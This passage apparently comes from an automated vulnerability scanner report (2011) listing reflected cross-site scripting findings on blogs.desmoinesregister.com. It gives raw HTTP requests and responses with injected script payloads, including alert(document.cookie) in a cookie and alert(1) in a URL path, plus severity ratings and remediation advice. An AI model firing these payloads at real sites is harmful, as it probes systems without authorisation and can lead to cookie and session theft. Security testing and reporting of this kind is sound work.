Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom; GCIONSN=AAAAOn52dzoy; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A15H%2Cplacementid%3A1272947%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1272948/0/0/ADTECH%253Balias%253Dblogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.csse743e%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C/script%25253E045c9ac9fe9_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D70722%253Bmisc%253D1297695939669%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1297749939

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 15:10:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 70697

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr33191"><script>alert(1)</script>647610c6837/" />
...[SNIP]...

3.127. http://blogs.desmoinesregister.com/dmr/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c487"%3balert(1)//001bc3b6472 was submitted in the REST URL parameter 1. This input was echoed as 6c487";alert(1)//001bc3b6472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dmr6c487"%3balert(1)//001bc3b6472/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml